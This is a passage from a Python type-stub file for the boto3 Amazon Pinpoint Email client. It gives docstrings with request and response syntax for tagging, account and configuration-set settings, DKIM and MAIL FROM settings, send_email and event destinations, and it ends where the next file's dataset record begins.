``MANAGED_DOMAIN`` – The identity is a domain that is managed by AWS. \n - **IdentityName** *(string) --* \n The address or domain of the identity.\n - **SendingEnabled** *(boolean) --* \n Indicates whether or not you can send email from the identity.\n In Amazon Pinpoint, an identity is an email address or domain that you send email from. Before you can send email from an identity, you have to demostrate that you own the identity, and that you authorize Amazon Pinpoint to send email from that identity.\n - **NextToken** *(string) --* \n A token that indicates that there are additional configuration sets to list. To view additional configuration sets, issue another request to ``ListEmailIdentities`` , and pass this token in the ``NextToken`` parameter.\n :type NextToken: string\n :param NextToken:\n A token returned from a previous call to ``ListEmailIdentities`` to indicate the position in the list of identities.\n :type PageSize: integer\n :param PageSize:\n The number of results to show in a single call to ``ListEmailIdentities`` . If the number of results is larger than the number you specified in this parameter, then the response includes a ``NextToken`` element, which you can use to obtain additional results.\n The value you specify has to be at least 0, and can be no more than 1000.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def list_tags_for_resource(self, ResourceArn: str) -> Dict:\n \"\"\"\n Retrieve a list of the tags (keys and values) that are associated with a specific resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Each tag consists of a required *tag key* and an optional associated *tag value* . A tag key is a general label that acts as a category for more specific tag values. A tag value acts as a descriptor within a tag key.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.list_tags_for_resource(\n ResourceArn='string'\n )\n \n **Response Syntax**\n ::\n {\n 'Tags': [\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n }\n \n **Response Structure**\n - *(dict) --* \n - **Tags** *(list) --* \n An array that lists all the tags that are associated with the resource. Each tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` )\n - *(dict) --* \n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive. \n * For each associated resource, each tag key must be unique and it can have only one value. \n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can't edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource. \n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account. \n - **Key** *(string) --* \n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* \n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to retrieve tag information for.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_account_dedicated_ip_warmup_attributes(self, AutoWarmupEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable the automatic warm-up feature for dedicated IP addresses.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_account_dedicated_ip_warmup_attributes(\n AutoWarmupEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type AutoWarmupEnabled: boolean\n :param AutoWarmupEnabled:\n Enables or disables the automatic warm-up feature for dedicated IP addresses that are associated with your Amazon Pinpoint account in the current AWS Region. Set to ``true`` to enable the automatic warm-up feature, or set to ``false`` to disable it.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_account_sending_attributes(self, SendingEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable the ability of your account to send email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_account_sending_attributes(\n SendingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type SendingEnabled: boolean\n :param SendingEnabled:\n Enables or disables your account\\'s ability to send email. Set to ``true`` to enable email sending, or set to ``false`` to disable email sending.\n .. note::\n If AWS paused your account\\'s ability to send email, you can\\'t use this operation to resume your account\\'s ability to send email.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_delivery_options(self, ConfigurationSetName: str, SendingPoolName: str = None) -> Dict:\n \"\"\"\n Associate a configuration set with a dedicated IP pool. You can use dedicated IP pools to create groups of dedicated IP addresses for sending specific types of email.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_delivery_options(\n ConfigurationSetName='string',\n SendingPoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to associate with a dedicated IP pool.\n :type SendingPoolName: string\n :param SendingPoolName:\n The name of the dedicated IP pool that you want to associate with the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_reputation_options(self, ConfigurationSetName: str, ReputationMetricsEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable collection of reputation metrics for emails that you send using a particular configuration set in a specific AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_reputation_options(\n ConfigurationSetName='string',\n ReputationMetricsEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to enable or disable reputation metric tracking for.\n :type ReputationMetricsEnabled: boolean\n :param ReputationMetricsEnabled:\n If ``true`` , tracking of reputation metrics is enabled for the configuration set. If ``false`` , tracking of reputation metrics is disabled for the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_sending_options(self, ConfigurationSetName: str, SendingEnabled: bool = None) -> Dict:\n \"\"\"\n Enable or disable email sending for messages that use a particular configuration set in a specific AWS Region.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_sending_options(\n ConfigurationSetName='string',\n SendingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to enable or disable email sending for.\n :type SendingEnabled: boolean\n :param SendingEnabled:\n If ``true`` , email sending is enabled for the configuration set. If ``false`` , email sending is disabled for the configuration set.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_configuration_set_tracking_options(self, ConfigurationSetName: str, CustomRedirectDomain: str = None) -> Dict:\n \"\"\"\n Specify a custom domain to use for open and click tracking elements in email that you send using Amazon Pinpoint.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_configuration_set_tracking_options(\n ConfigurationSetName='string',\n CustomRedirectDomain='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that you want to add a custom tracking domain to.\n :type CustomRedirectDomain: string\n :param CustomRedirectDomain:\n The domain that you want to use to track open and click events.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_dedicated_ip_in_pool(self, Ip: str, DestinationPoolName: str) -> Dict:\n \"\"\"\n Move a dedicated IP address to an existing dedicated IP pool.\n .. note::\n The dedicated IP address that you specify must already exist, and must be associated with your Amazon Pinpoint account. \n The dedicated IP pool you specify must already exist. You can create a new pool by using the ``CreateDedicatedIpPool`` operation.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_dedicated_ip_in_pool(\n Ip='string',\n DestinationPoolName='string'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The IP address that you want to move to the dedicated IP pool. The value you specify has to be a dedicated IP address that\\'s associated with your Amazon Pinpoint account.\n :type DestinationPoolName: string\n :param DestinationPoolName: **[REQUIRED]**\n The name of the IP pool that you want to add the dedicated IP address to. You have to specify an IP pool that already exists.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_dedicated_ip_warmup_attributes(self, Ip: str, WarmupPercentage: int) -> Dict:\n \"\"\"\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_dedicated_ip_warmup_attributes(\n Ip='string',\n WarmupPercentage=123\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type Ip: string\n :param Ip: **[REQUIRED]**\n The dedicated IP address that you want to update the warm-up attributes for.\n :type WarmupPercentage: integer\n :param WarmupPercentage: **[REQUIRED]**\n The warm-up percentage that you want to associate with the dedicated IP address.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_deliverability_dashboard_option(self, DashboardEnabled: bool) -> Dict:\n \"\"\"\n Enable or disable the Deliverability dashboard. When you enable the Deliverability dashboard, you gain access to reputation metrics for the domains that you use to send email using Amazon Pinpoint. You also gain the ability to perform predictive inbox placement tests.\n When you use the Deliverability dashboard, you pay a monthly charge of USD$1,250.00, in addition to any other fees that you accrue by using Amazon Pinpoint. If you enable the Deliverability dashboard after the first day of a calendar month, we prorate the monthly charge based on how many days have elapsed in the current calendar month.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_deliverability_dashboard_option(\n DashboardEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n A response that indicates whether the Deliverability dashboard is enabled for your Amazon Pinpoint account.\n :type DashboardEnabled: boolean\n :param DashboardEnabled: **[REQUIRED]**\n Indicates whether the Deliverability dashboard is enabled. If the value is ``true`` , then the dashboard is enabled.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_dkim_attributes(self, EmailIdentity: str, SigningEnabled: bool = None) -> Dict:\n \"\"\"\n Used to enable or disable DKIM authentication for an email identity.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_dkim_attributes(\n EmailIdentity='string',\n SigningEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to change the DKIM settings for.\n :type SigningEnabled: boolean\n :param SigningEnabled:\n Sets the DKIM signing configuration for the identity.\n When you set this value ``true`` , then the messages that Amazon Pinpoint sends from the identity are DKIM-signed. When you set this value to ``false`` , then the messages that Amazon Pinpoint sends from the identity aren\\'t DKIM-signed.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_feedback_attributes(self, EmailIdentity: str, EmailForwardingEnabled: bool = None) -> Dict:\n \"\"\"\n Used to enable or disable feedback forwarding for an identity. This setting determines what happens when an identity is used to send an email that results in a bounce or complaint event.\n When you enable feedback forwarding, Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you disable feedback forwarding, Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic. You're required to have a method of tracking bounces and complaints. If you haven't set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_feedback_attributes(\n EmailIdentity='string',\n EmailForwardingEnabled=True|False\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The email identity that you want to configure bounce and complaint feedback forwarding for.\n :type EmailForwardingEnabled: boolean\n :param EmailForwardingEnabled:\n Sets the feedback forwarding configuration for the identity.\n If the value is ``true`` , Amazon Pinpoint sends you email notifications when bounce or complaint events occur. Amazon Pinpoint sends this notification to the address that you specified in the Return-Path header of the original email.\n When you set this value to ``false`` , Amazon Pinpoint sends notifications through other mechanisms, such as by notifying an Amazon SNS topic or another event destination. You\\'re required to have a method of tracking bounces and complaints. If you haven\\'t set up another mechanism for receiving bounce or complaint notifications, Amazon Pinpoint sends an email notification when these events occur (even if this setting is disabled).\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def put_email_identity_mail_from_attributes(self, EmailIdentity: str, MailFromDomain: str = None, BehaviorOnMxFailure: str = None) -> Dict:\n \"\"\"\n Used to enable or disable the custom Mail-From domain configuration for an email identity.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.put_email_identity_mail_from_attributes(\n EmailIdentity='string',\n MailFromDomain='string',\n BehaviorOnMxFailure='USE_DEFAULT_VALUE'|'REJECT_MESSAGE'\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type EmailIdentity: string\n :param EmailIdentity: **[REQUIRED]**\n The verified email identity that you want to set up the custom MAIL FROM domain for.\n :type MailFromDomain: string\n :param MailFromDomain:\n The custom MAIL FROM domain that you want the verified identity to use. The MAIL FROM domain must meet the following criteria:\n * It has to be a subdomain of the verified identity.\n * It can\\'t be used to receive email.\n * It can\\'t be used in a \\\"From\\\" address if the MAIL FROM domain is a destination for feedback forwarding emails.\n :type BehaviorOnMxFailure: string\n :param BehaviorOnMxFailure:\n The action that you want Amazon Pinpoint to take if it can\\'t read the required MX record when you send an email. When you set this value to ``UseDefaultValue`` , Amazon Pinpoint uses *amazonses.com* as the MAIL FROM domain. When you set this value to ``RejectMessage`` , Amazon Pinpoint returns a ``MailFromDomainNotVerified`` error, and doesn\\'t attempt to deliver the email.\n These behaviors are taken when the custom MAIL FROM domain configuration is in the ``Pending`` , ``Failed`` , and ``TemporaryFailure`` states.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def send_email(self, Destination: Dict, Content: Dict, FromEmailAddress: str = None, ReplyToAddresses: List = None, FeedbackForwardingEmailAddress: str = None, EmailTags: List = None, ConfigurationSetName: str = None) -> Dict:\n \"\"\"\n Sends an email message. You can use the Amazon Pinpoint Email API to send two types of messages:\n * **Simple** – A standard email message. When you create this type of message, you specify the sender, the recipient, and the message body, and Amazon Pinpoint assembles the message for you. \n * **Raw** – A raw, MIME-formatted email message. When you send this type of email, you have to specify all of the message headers, as well as the message body. You can use this message type to send messages that contain attachments. The message that you specify has to be a valid MIME message. \n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.send_email(\n FromEmailAddress='string',\n Destination={\n 'ToAddresses': [\n 'string',\n ],\n 'CcAddresses': [\n 'string',\n ],\n 'BccAddresses': [\n 'string',\n ]\n },\n ReplyToAddresses=[\n 'string',\n ],\n FeedbackForwardingEmailAddress='string',\n Content={\n 'Simple': {\n 'Subject': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Body': {\n 'Text': {\n 'Data': 'string',\n 'Charset': 'string'\n },\n 'Html': {\n 'Data': 'string',\n 'Charset': 'string'\n }\n }\n },\n 'Raw': {\n 'Data': b'bytes'\n }\n },\n EmailTags=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n ConfigurationSetName='string'\n )\n \n **Response Syntax**\n ::\n {\n 'MessageId': 'string'\n }\n \n **Response Structure**\n - *(dict) --* \n A unique message ID that you receive when Amazon Pinpoint accepts an email for sending.\n - **MessageId** *(string) --* \n A unique identifier for the message that is generated when Amazon Pinpoint accepts the message.\n .. note::\n It is possible for Amazon Pinpoint to accept a message without sending it. This can happen when the message you're trying to send has an attachment doesn't pass a virus check, or when you send a templated email that contains invalid personalization content, for example.\n :type FromEmailAddress: string\n :param FromEmailAddress:\n The email address that you want to use as the \\\"From\\\" address for the email. The address that you specify has to be verified.\n :type Destination: dict\n :param Destination: **[REQUIRED]**\n An object that contains the recipients of the email message.\n - **ToAddresses** *(list) --*\n An array that contains the email addresses of the \\\"To\\\" recipients for the email.\n - *(string) --*\n - **CcAddresses** *(list) --*\n An array that contains the email addresses of the \\\"CC\\\" (carbon copy) recipients for the email.\n - *(string) --*\n - **BccAddresses** *(list) --*\n An array that contains the email addresses of the \\\"BCC\\\" (blind carbon copy) recipients for the email.\n - *(string) --*\n :type ReplyToAddresses: list\n :param ReplyToAddresses:\n The \\\"Reply-to\\\" email addresses for the message. When the recipient replies to the message, each Reply-to address receives the reply.\n - *(string) --*\n :type FeedbackForwardingEmailAddress: string\n :param FeedbackForwardingEmailAddress:\n The address that Amazon Pinpoint should send bounce and complaint notifications to.\n :type Content: dict\n :param Content: **[REQUIRED]**\n An object that contains the body of the message. You can send either a Simple message or a Raw message.\n - **Simple** *(dict) --*\n The simple email message. The message consists of a subject and a message body.\n - **Subject** *(dict) --* **[REQUIRED]**\n The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify non-ASCII characters in the subject line by using encoded-word syntax, as described in `RFC 2047 `__ .\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Body** *(dict) --* **[REQUIRED]**\n The body of the message. You can specify an HTML version of the message, a text-only version of the message, or both.\n - **Text** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that don\\'t support HTML, or clients where the recipient has disabled HTML rendering.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Html** *(dict) --*\n An object that represents the version of the message that is displayed in email clients that support HTML. HTML messages can include formatted text, hyperlinks, images, and more.\n - **Data** *(string) --* **[REQUIRED]**\n The content of the message itself.\n - **Charset** *(string) --*\n The character set for the content. Because of the constraints of the SMTP protocol, Amazon Pinpoint uses 7-bit ASCII by default. If the text includes characters outside of the ASCII range, you have to specify a character set. For example, you could specify ``UTF-8`` , ``ISO-8859-1`` , or ``Shift_JIS`` .\n - **Raw** *(dict) --*\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * If you include attachments, they must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n - **Data** *(bytes) --* **[REQUIRED]**\n The raw email message. The message has to meet the following criteria:\n * The message has to contain a header and a body, separated by one blank line.\n * All of the required header fields must be present in the message.\n * Each part of a multipart MIME message must be formatted properly.\n * Attachments must be in a file format that Amazon Pinpoint supports.\n * The entire message must be Base64 encoded.\n * If any of the MIME parts in your message contain content that is outside of the 7-bit ASCII character range, you should encode that content to ensure that recipients\\' email clients render the message properly.\n * The length of any single line of text in the message can\\'t exceed 1,000 characters. This restriction is defined in `RFC 5321 `__ .\n :type EmailTags: list\n :param EmailTags:\n A list of tags, in the form of name/value pairs, to apply to an email that you send using the ``SendEmail`` operation. Tags correspond to characteristics of the email that you define, so that you can publish email sending events.\n - *(dict) --*\n Contains the name and value of a tag that you apply to an email. You can use message tags when you publish email sending events.\n - **Name** *(string) --* **[REQUIRED]**\n The name of the message tag. The message tag name has to meet the following criteria:\n * It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **Value** *(string) --* **[REQUIRED]**\n The value of the message tag. The message tag value has to meet the following criteria:\n * It can only contain ASCII letters (a–z, A–Z), numbers (0–9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n :type ConfigurationSetName: string\n :param ConfigurationSetName:\n The name of the configuration set that you want to use when sending the email.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def tag_resource(self, ResourceArn: str, Tags: List) -> Dict:\n \"\"\"\n Add one or more tags (keys and values) to one or more specified resources. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for more specific tag values. A tag value acts as a descriptor within a tag key.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.tag_resource(\n ResourceArn='string',\n Tags=[\n {\n 'Key': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to add one or more tags to.\n :type Tags: list\n :param Tags: **[REQUIRED]**\n A list of the tags that you want to add to the resource. A tag consists of a required tag key (``Key`` ) and an associated tag value (``Value`` ). The maximum length of a tag key is 128 characters. The maximum length of a tag value is 256 characters.\n - *(dict) --*\n An object that defines the tags that are associated with a resource. A *tag* is a label that you optionally define and associate with a resource in Amazon Pinpoint. Tags can help you categorize and manage resources in different ways, such as by purpose, owner, environment, or other criteria. A resource can have as many as 50 tags.\n Each tag consists of a required *tag key* and an associated *tag value* , both of which you define. A tag key is a general label that acts as a category for a more specific tag value. A tag value acts as a descriptor within a tag key. For example, if you have two versions of an Amazon Pinpoint project, one for internal testing and another for external use, you might assign a ``Stack`` tag key to both projects. The value of the ``Stack`` tag key might be ``Test`` for one project and ``Production`` for the other project.\n A tag key can contain as many as 128 characters. A tag value can contain as many as 256 characters. The characters can be Unicode letters, digits, white space, or one of the following symbols: _ . : / = + -. The following additional restrictions apply to tags:\n * Tag keys and values are case sensitive.\n * For each associated resource, each tag key must be unique and it can have only one value.\n * The ``aws:`` prefix is reserved for use by AWS; you can’t use it in any tag keys or values that you define. In addition, you can\\'t edit or remove tag keys or values that use this prefix. Tags that use this prefix don’t count against the limit of 50 tags per resource.\n * You can associate tags with public or shared resources, but the tags are available only for your AWS account, not any other accounts that share the resource. In addition, the tags are available only for resources that are located in the specified AWS Region for your AWS account.\n - **Key** *(string) --* **[REQUIRED]**\n One part of a key-value pair that defines a tag. The maximum length of a tag key is 128 characters. The minimum length is 1 character.\n - **Value** *(string) --* **[REQUIRED]**\n The optional part of a key-value pair that defines a tag. The maximum length of a tag value is 256 characters. The minimum length is 0 characters. If you don’t want a resource to have a specific tag value, don’t specify a value for this parameter. Amazon Pinpoint will set the value to an empty string.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def untag_resource(self, ResourceArn: str, TagKeys: List) -> Dict:\n \"\"\"\n Remove one or more tags (keys and values) from a specified resource.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.untag_resource(\n ResourceArn='string',\n TagKeys=[\n 'string',\n ]\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n :type ResourceArn: string\n :param ResourceArn: **[REQUIRED]**\n The Amazon Resource Name (ARN) of the resource that you want to remove one or more tags from.\n :type TagKeys: list\n :param TagKeys: **[REQUIRED]**\n The tags (tag keys) that you want to remove from the resource. When you specify a tag key, the action removes both that key and its associated tag value.\n To remove more than one tag from the resource, append the ``TagKeys`` parameter and argument for each additional tag to remove, separated by an ampersand. For example: ``/v1/email/tags?ResourceArn=ResourceArn&TagKeys=Key1&TagKeys=Key2``\n - *(string) --*\n :rtype: dict\n :returns:\n \"\"\"\n pass\n\n def update_configuration_set_event_destination(self, ConfigurationSetName: str, EventDestinationName: str, EventDestination: Dict) -> Dict:\n \"\"\"\n Update the configuration of an event destination for a configuration set.\n In Amazon Pinpoint, *events* include message sends, deliveries, opens, clicks, bounces, and complaints. *Event destinations* are places that you can send information about these events to. For example, you can send event data to Amazon SNS to receive notifications when you receive bounces or complaints, or you can use Amazon Kinesis Data Firehose to stream data to Amazon S3 for long-term storage.\n See also: `AWS API Documentation `_\n \n **Request Syntax**\n ::\n response = client.update_configuration_set_event_destination(\n ConfigurationSetName='string',\n EventDestinationName='string',\n EventDestination={\n 'Enabled': True|False,\n 'MatchingEventTypes': [\n 'SEND'|'REJECT'|'BOUNCE'|'COMPLAINT'|'DELIVERY'|'OPEN'|'CLICK'|'RENDERING_FAILURE',\n ],\n 'KinesisFirehoseDestination': {\n 'IamRoleArn': 'string',\n 'DeliveryStreamArn': 'string'\n },\n 'CloudWatchDestination': {\n 'DimensionConfigurations': [\n {\n 'DimensionName': 'string',\n 'DimensionValueSource': 'MESSAGE_TAG'|'EMAIL_HEADER'|'LINK_TAG',\n 'DefaultDimensionValue': 'string'\n },\n ]\n },\n 'SnsDestination': {\n 'TopicArn': 'string'\n },\n 'PinpointDestination': {\n 'ApplicationArn': 'string'\n }\n }\n )\n \n **Response Syntax**\n ::\n {}\n \n **Response Structure**\n - *(dict) --* \n An HTTP 200 response if the request succeeds, or an error message if the request fails.\n :type ConfigurationSetName: string\n :param ConfigurationSetName: **[REQUIRED]**\n The name of the configuration set that contains the event destination that you want to modify.\n :type EventDestinationName: string\n :param EventDestinationName: **[REQUIRED]**\n The name of the event destination that you want to modify.\n :type EventDestination: dict\n :param EventDestination: **[REQUIRED]**\n An object that defines the event destination.\n - **Enabled** *(boolean) --*\n If ``true`` , the event destination is enabled. When the event destination is enabled, the specified event types are sent to the destinations in this ``EventDestinationDefinition`` .\n If ``false`` , the event destination is disabled. When the event destination is disabled, events aren\\'t sent to the specified destinations.\n - **MatchingEventTypes** *(list) --*\n An array that specifies which events Amazon Pinpoint should send to the destinations in this ``EventDestinationDefinition`` .\n - *(string) --*\n An email sending event type. For example, email sends, opens, and bounces are all email events.\n - **KinesisFirehoseDestination** *(dict) --*\n An object that defines an Amazon Kinesis Data Firehose destination for email events. You can use Amazon Kinesis Data Firehose to stream data to other services, such as Amazon S3 and Amazon Redshift.\n - **IamRoleArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the IAM role that Amazon Pinpoint uses when sending email events to the Amazon Kinesis Data Firehose stream.\n - **DeliveryStreamArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon Kinesis Data Firehose stream that Amazon Pinpoint sends email events to.\n - **CloudWatchDestination** *(dict) --*\n An object that defines an Amazon CloudWatch destination for email events. You can use Amazon CloudWatch to monitor and gain insights on your email sending metrics.\n - **DimensionConfigurations** *(list) --* **[REQUIRED]**\n An array of objects that define the dimensions to use when you send email events to Amazon CloudWatch.\n - *(dict) --*\n An object that defines the dimension configuration to use when you send Amazon Pinpoint email events to Amazon CloudWatch.\n - **DimensionName** *(string) --* **[REQUIRED]**\n The name of an Amazon CloudWatch dimension associated with an email sending metric. The name has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **DimensionValueSource** *(string) --* **[REQUIRED]**\n The location where Amazon Pinpoint finds the value of a dimension to publish to Amazon CloudWatch. If you want Amazon Pinpoint to use the message tags that you specify using an X-SES-MESSAGE-TAGS header or a parameter to the SendEmail/SendRawEmail API, choose ``messageTag`` . If you want Amazon Pinpoint to use your own email headers, choose ``emailHeader`` . If you want Amazon Pinpoint to use link tags, choose ``linkTags`` .\n - **DefaultDimensionValue** *(string) --* **[REQUIRED]**\n The default value of the dimension that is published to Amazon CloudWatch if you don\\'t provide the value of the dimension when you send an email. This value has to meet the following criteria:\n * It can only contain ASCII letters (a-z, A-Z), numbers (0-9), underscores (_), or dashes (-).\n * It can contain no more than 256 characters.\n - **SnsDestination** *(dict) --*\n An object that defines an Amazon SNS destination for email events. You can use Amazon SNS to send notification when certain email events occur.\n - **TopicArn** *(string) --* **[REQUIRED]**\n The Amazon Resource Name (ARN) of the Amazon SNS topic that you want to publish email events to. For more information about Amazon SNS topics, see the `Amazon SNS Developer Guide `__ .\n - **PinpointDestination** *(dict) --*\n An object that defines a Amazon Pinpoint destination for email events. You can use Amazon Pinpoint events to create attributes in Amazon Pinpoint projects. You can use these attributes to create segments for your campaigns.\n - **ApplicationArn** *(string) --*\n The Amazon Resource Name (ARN) of the Amazon Pinpoint project that you want to send email events to.\n :rtype: dict\n :returns:\n \"\"\"\n pass\n"} {"ext": "py", "sha": "1a2fdcd5621eb97edc60c038cd9ce943d5bb93d9", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nContains generic utillity 